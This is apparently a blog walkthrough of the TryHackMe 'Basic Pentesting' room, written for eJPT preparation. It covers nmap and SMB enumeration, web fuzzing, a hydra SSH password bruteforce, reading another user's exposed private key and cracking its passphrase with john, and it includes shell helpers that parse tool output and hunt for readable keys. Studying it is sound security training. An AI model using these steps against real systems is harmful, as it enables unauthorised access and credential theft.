Summary

Basic Pentesting is the first machine in my Road to eJPTv2 series. It is an excellent starting point because it covers several areas that appear on the exam: service enumeration (SMB, HTTP), directory fuzzing, SSH bruteforce, and cracking the passphrase of an SSH private key. If you are starting with TryHackMe and the eJPT, this machine is a must.

Attribute    Value
Platform     TryHackMe
Difficulty   Easy
OS           Linux
Room         Basic Pentesting
Skills       SMB Enum, Web Fuzzing, SSH Bruteforce, SSH Key Cracking

Video version

If you prefer to follow the walkthrough step by step, keep reading. The video covers the same process in visual format.

Tools used

  • nmap — port and service enumeration
  • enum4linux — SMB enumeration
  • gobuster — web directory fuzzing
  • hydra — SSH bruteforce
  • ssh2john + john — SSH key hash extraction and cracking

Solution overview

  1. Nmap reveals SSH, HTTP and SMB, plus Tomcat on 8080 with its AJP connector on 8009
  2. SMB enumeration with enum4linux reveals two users: jan and kay
  3. Web fuzzing with gobuster discovers a /development directory with hints
  4. SSH bruteforce with hydra against user jan obtains credentials
  5. Inside the system, we find that kay’s private key (id_rsa) is readable by other users
  6. The key is protected with a passphrase, which we crack with john for the final access as kay

Reconnaissance

Connectivity check

ping -c 1 10.X.X.X

TTL=60: Linux and most Unix hosts reply with an initial TTL of 64 (Windows uses 128), and every hop decrements it by one, so 60 points to a Unix host a few hops away. The value is only a hint, but it makes Windows-only exploits such as EternalBlue (MS17-010, which does not affect Samba) a poor bet and orients the strategy toward Unix service enumeration.

Nmap port scan

Initial sweep of all TCP ports:

nmap 10.X.X.X -n -Pn -sS -p- --min-rate=5000 -oG allTCPports

Flag justification:

  • -n skips DNS resolution, which makes the scan faster
  • -Pn assumes the host is up and skips host discovery (some firewalls block ICMP)
  • -sS SYN (half-open) scan: sends the SYN and never completes the handshake; it needs root for raw sockets
  • --min-rate=5000 forces a minimum of 5000 packets/sec; fast, but on a lossy VPN link it can miss ports, so rescan if the results look thin
  • -oG greppable output, useful for extracting the open ports and feeding them to the next scan

Once the open ports are identified, run a targeted scan with version detection and default scripts (-sVC is shorthand for -sV -sC):

nmap 10.X.X.X -n -Pn -sS -sVC -p22,80,139,445,8009,8080 --min-rate=5000 -oN basicscan.txt
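As an added example (not code from the original walkthrough), here are two small POSIX sh helpers for this recon phase: ttl_guess turns the ping TTL into the OS-family and hop estimate used above, and open_ports_from_grepable extracts the open ports from the -oG file so they can be handed straight to the targeted -sVC scan. The greppable output embedded in sample_grepable is constructed to match this box's ports, and 10.X.X.X is the placeholder address the walkthrough uses.

```shell
#!/bin/sh
# Added example: recon helpers for the two-phase nmap workflow.
# Not part of the original walkthrough; the nmap output below is constructed.

# Map a ping TTL to the most likely initial TTL and OS family.
# Typical defaults: 64 = Linux/Unix, 128 = Windows, 255 = network gear/Solaris.
# Each hop decrements the TTL, so 60 means a 64-TTL host four hops away.
# This is a heuristic only: a host can be configured with any initial TTL.
ttl_guess() {
  ttl="$1"
  if [ "$ttl" -le 64 ]; then
    base=64; family="linux/unix"
  elif [ "$ttl" -le 128 ]; then
    base=128; family="windows"
  else
    base=255; family="network-device/solaris"
  fi
  printf '%s hops=%d\n' "$family" $((base - ttl))
}

# Extract the open TCP ports from nmap -oG output (file arguments or stdin)
# as "22,80,..." so the result can be passed to a targeted scan with -p.
open_ports_from_grepable() {
  cat "$@" | grep -o '[0-9][0-9]*/open/' | cut -d/ -f1 | sort -n -u | paste -s -d , -
}

# Constructed stand-in for the allTCPports file written by the -p- sweep.
sample_grepable() {
  cat <<'EOF'
# Nmap scan initiated as: nmap 10.X.X.X -n -Pn -sS -p- --min-rate=5000 -oG allTCPports
Host: 10.X.X.X ()  Status: Up
Host: 10.X.X.X ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 8009/open/tcp//ajp13///, 8080/open/tcp//http-proxy///  Ignored State: closed (65529)
# Nmap done -- 1 IP address (1 host up) scanned
EOF
}

# Demo: the TTL from the connectivity check, then the port list the second scan needs.
ttl_guess 60
ports=$(sample_grepable | open_ports_from_grepable)
echo "targeted scan: nmap 10.X.X.X -n -Pn -sS -sVC -p$ports --min-rate=5000 -oN basicscan.txt"
```

On a real engagement replace sample_grepable with the actual file (open_ports_from_grepable allTCPports) and paste the printed port list into the second nmap command; the parser only keys on the /open/ marker, so filtered or closed ports never leak into the targeted scan.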

Key findings:

  • 22/tcp: OpenSSH (potential bruteforce vector)
  • 80/tcp: Apache (review content and fuzz directories)
  • 139/445 tcp: Samba (enumerate with enum4linux)
  • 8009/tcp: AJP13, the Tomcat connector that fronts the service on 8080
  • 8080/tcp: Apache Tomcat (potential admin login)

SMB enumeration with enum4linux

SMB is one of the most rewarding vectors on misconfigured Linux machines. Poorly protected users and shares often leak sensitive information.

enum4linux -a 10.X.X.X

Critical finding: two system users:

  • jan
  • kay

This changes the plan: now we have usernames, opening the door to targeted SSH bruteforce.

Web service enumeration

Before jumping to bruteforce, we check the web for plaintext credentials or hints.

whatweb

whatweb http://10.X.X.X

Identifies the stack: Apache + standard tech. Nothing flashy at first glance.

Fuzzing with gobuster

gobuster dir -u http://10.X.X.X \
  -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt \
  -t 50 -x php,txt,html

Finding: accessible /development directory.

Inside, we find dev.txt with a message signed by two people, J and K — matches the users found via SMB. The notes mention that J is using a weak password.

Reasoning: this is the classic “info the dev team leaves by mistake” pattern. The hint is clear: jan has a weak password → targeted SSH bruteforce.


Exploitation

Attack vector

With the previous findings, the plan is:

  1. SSH bruteforce against user jan with hydra and a common wordlist
  2. Once inside, pivot to kay (likely the user with more privileges, based on the document signature)

SSH bruteforce with Hydra

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.X.X.X -t 4

Flag justification:

  • -l jan single user (not -L which would be a user list)
  • -P rockyou.txt the most common wordlist for weak passwords
  • -t 4 four parallel tasks. hydra itself recommends -t 4 for SSH: sshd’s MaxStartups (default 10:30:100) starts dropping unauthenticated connections once too many are pending, and fail2ban-style tooling may ban the attacking IP, so more threads usually mean missed passwords rather than speed
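As an added example (not code from the original walkthrough), two POSIX sh parsers glue the SMB step to this one: users_from_enum4linux lifts the user:[name] lines out of enum4linux output into a list suitable for hydra -L, and creds_from_hydra pulls user:password pairs out of hydra's result lines. The enum4linux and hydra outputs embedded below are constructed to mirror what this box produces; the hydra command is only printed, never executed.

```shell
#!/bin/sh
# Added example: turn enum4linux's user listing into a hydra user list and
# pull the found credentials back out of hydra's output.
# Not part of the original walkthrough; both tool outputs below are constructed.

# enum4linux prints each RID-cycled account as "user:[name] rid:[0x...]".
# Extract the names, deduplicated, one per line (ready for hydra -L).
users_from_enum4linux() {
  cat "$@" | sed -n 's/^user:\[\([^]]*\)].*/\1/p' | sort -u
}

# hydra reports hits as "[22][ssh] host: H   login: U   password: P".
# Reduce them to user:password lines.
creds_from_hydra() {
  cat "$@" | sed -n 's/^\[[0-9]*]\[ssh] host: [^ ]*  *login: \([^ ]*\)  *password: \(.*\)$/\1:\2/p'
}

# Constructed excerpt of enum4linux -a output (user enumeration section).
sample_enum4linux() {
  cat <<'EOF'
 ==============================( Users on 10.X.X.X )==============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: jan    Name:    Desc:
index: 0x2 RID: 0x3e9 acb: 0x00000010 Account: kay    Name:    Desc:

user:[jan] rid:[0x3e8]
user:[kay] rid:[0x3e9]
EOF
}

# Constructed excerpt of hydra output for the SSH bruteforce.
sample_hydra() {
  cat <<'EOF'
[DATA] max 4 tasks per 1 server, overall 4 tasks
[DATA] attacking ssh://10.X.X.X:22/
[22][ssh] host: 10.X.X.X   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
EOF
}

# Demo: write the user list and show the hydra invocation. -L takes the file;
# -t 4 stays under sshd's MaxStartups so connections are not dropped mid-run.
userfile=$(mktemp)
sample_enum4linux | users_from_enum4linux > "$userfile"
echo "hydra -L $userfile -P /usr/share/wordlists/rockyou.txt ssh://10.X.X.X -t 4"
sample_hydra | creds_from_hydra
rm -f "$userfile"
```

With real output, pipe enum4linux into users_from_enum4linux (enum4linux -a 10.X.X.X | users_from_enum4linux > users.txt) and tee hydra into creds_from_hydra so the hits land in a file you can reuse for ssh without retyping them.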

Credentials obtained: jan:armando

Initial access via SSH

ssh jan@10.X.X.X

Now inside the system with jan’s limited permissions.


Post-exploitation

Identity and context

id
uname -a
hostname

uid=1001(jan) gid=1001(jan) groups=1001(jan)
Linux basic-pentesting 4.4.0-...

jan is a standard user without visible privileged groups. Time to enumerate the system looking for the path to kay or root.

System enumeration

Reviewing home directories and accessible files:

ls -la /home/
ls -la /home/kay/
ls -la /home/kay/.ssh/

Critical finding: kay’s .ssh directory and the id_rsa inside it are readable by other users, so jan can read kay’s SSH private key.

cat /home/kay/.ssh/id_rsa

I copy the full key to my attacking machine for processing.
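As an added example (not code from the original walkthrough), the following POSIX sh functions automate the check that found kay's key: readable_private_keys lists private key files under a home root whose mode grants read to "other", and key_is_encrypted reports whether a key is passphrase-protected, which decides whether ssh2john and john are the next step or the key can be used directly. The home tree built by make_fixture is constructed for the demo (the user names jan and kay are the box's; the third user and the unencrypted OpenSSH-format key are invented for contrast).

```shell
#!/bin/sh
# Added example: find private keys that other users left readable, and tell
# whether each one is passphrase-protected.
# Not part of the original walkthrough; the fixture home tree is constructed.

# List private key files under a home root whose mode grants read to "other".
# On a real target add ! -user "$(id -un)" to the find to skip your own keys.
readable_private_keys() {
  find "$1" -type f \( -name id_rsa -o -name id_dsa -o -name id_ecdsa -o -name id_ed25519 \) \
    -perm -o=r 2>/dev/null | sort
}

# Return 0 if the key is encrypted. Legacy PEM keys announce it in a header;
# openssh-key-v1 keys store the cipher name right after the "openssh-key-v1\0"
# magic, and an unencrypted key uses the cipher "none".
key_is_encrypted() {
  if grep -q 'Proc-Type: 4,ENCRYPTED' "$1"; then
    return 0
  fi
  if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1"; then
    cipher=$(sed '/^-----/d' "$1" | tr -d '\n' | base64 -d 2>/dev/null \
             | tr -cs '[:print:]' '\n' | sed -n '2p')
    if [ "$cipher" = "none" ]; then
      return 1
    fi
    return 0
  fi
  return 1
}

# Build a constructed /home lookalike: jan's key locked down, kay's key
# world-readable and passphrase-protected (PEM), plus a world-readable
# unencrypted openssh-key-v1 key for a hypothetical user "dev".
make_fixture() {
  root=$(mktemp -d)
  mkdir -p "$root/jan/.ssh" "$root/kay/.ssh" "$root/dev/.ssh"
  printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
    'DEK-Info: AES-128-CBC,00000000000000000000000000000000' '' 'AAAA' \
    '-----END RSA PRIVATE KEY-----' > "$root/kay/.ssh/id_rsa"
  cp "$root/kay/.ssh/id_rsa" "$root/jan/.ssh/id_rsa"
  # Minimal openssh-key-v1 header: magic (NUL-terminated), then the
  # length-prefixed cipher name "none". Enough for the header check above.
  { echo '-----BEGIN OPENSSH PRIVATE KEY-----'
    printf 'openssh-key-v1\000\000\000\000\004none' | base64
    echo '-----END OPENSSH PRIVATE KEY-----'; } > "$root/dev/.ssh/id_ed25519"
  chmod 700 "$root/jan/.ssh"; chmod 600 "$root/jan/.ssh/id_rsa"
  chmod 755 "$root/kay/.ssh" "$root/dev/.ssh"
  chmod 644 "$root/kay/.ssh/id_rsa" "$root/dev/.ssh/id_ed25519"
  echo "$root"
}

# Demo: enumerate the fixture the way you would enumerate /home on the target.
root=$(make_fixture)
for key in $(readable_private_keys "$root"); do
  if key_is_encrypted "$key"; then
    echo "$key: readable, passphrase-protected -> ssh2john + john"
  else
    echo "$key: readable, NOT encrypted -> usable directly with ssh -i"
  fi
done
rm -rf "$root"
```

On the box itself the call is readable_private_keys /home followed by key_is_encrypted on each hit; a key that comes back unencrypted skips the cracking step entirely, which is exactly why readable key material matters even when the owner thinks the passphrase protects it.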


Privilege escalation

Identified vector

kay’s private key is readable, but it is protected with a passphrase. If I can crack the passphrase, I get direct SSH access as kay. Strictly this is lateral movement rather than privilege escalation, but kay is the user the development note points at, and the final file, pass.bak, lives in kay’s home.

Hash extraction with ssh2john

john can’t attack an encrypted SSH key directly; ssh2john (shipped with John the Ripper, on Kali also available as /usr/share/john/ssh2john.py) first converts the key into a hash format john understands:

ssh2john id_rsa > kay_hash

Cracking with John the Ripper

john --wordlist=/usr/share/wordlists/rockyou.txt kay_hash

Passphrase obtained: beeswax

Final access as kay

chmod 600 id_rsa
ssh -i id_rsa kay@10.X.X.X

After entering the passphrase we get a shell as kay. The chmod 600 is not optional: ssh refuses to use a private key that is readable by others. To confirm the cracked passphrase before connecting, ssh-keygen -y -f id_rsa prints the matching public key only when the passphrase is correct.

Flag capture

cat /home/kay/pass.bak

Final flag: [contents of pass.bak]


Lessons learned

  • SMB is gold on Linux machines — enum4linux should be one of your first moves when ports 139/445 appear. The user list obtained changed the entire plan.
  • .txt file hints are intentional — In CTFs, files like dev.txt, notes.md, todo.txt usually contain key info. Don’t skip them.
  • Misconfigured .ssh permissions — A private key readable by other users is a common vulnerability in poorly administered real-world environments. Always check /home/*/.ssh/.
  • SSH key passphrases are crackable — ssh2john + john is the standard combo. A weak passphrase completely defeats the protection of key encryption.

For the eJPT

This machine exercises skills directly evaluated on the eJPT:

  • Nmap enumeration (key syntax and flags)
  • SMB enumeration with enum4linux
  • Directory fuzzing with gobuster
  • Bruteforcing with hydra
  • Hash manipulation and cracking with john

Approximate solving time: 30-45 minutes for someone familiar with the tools.

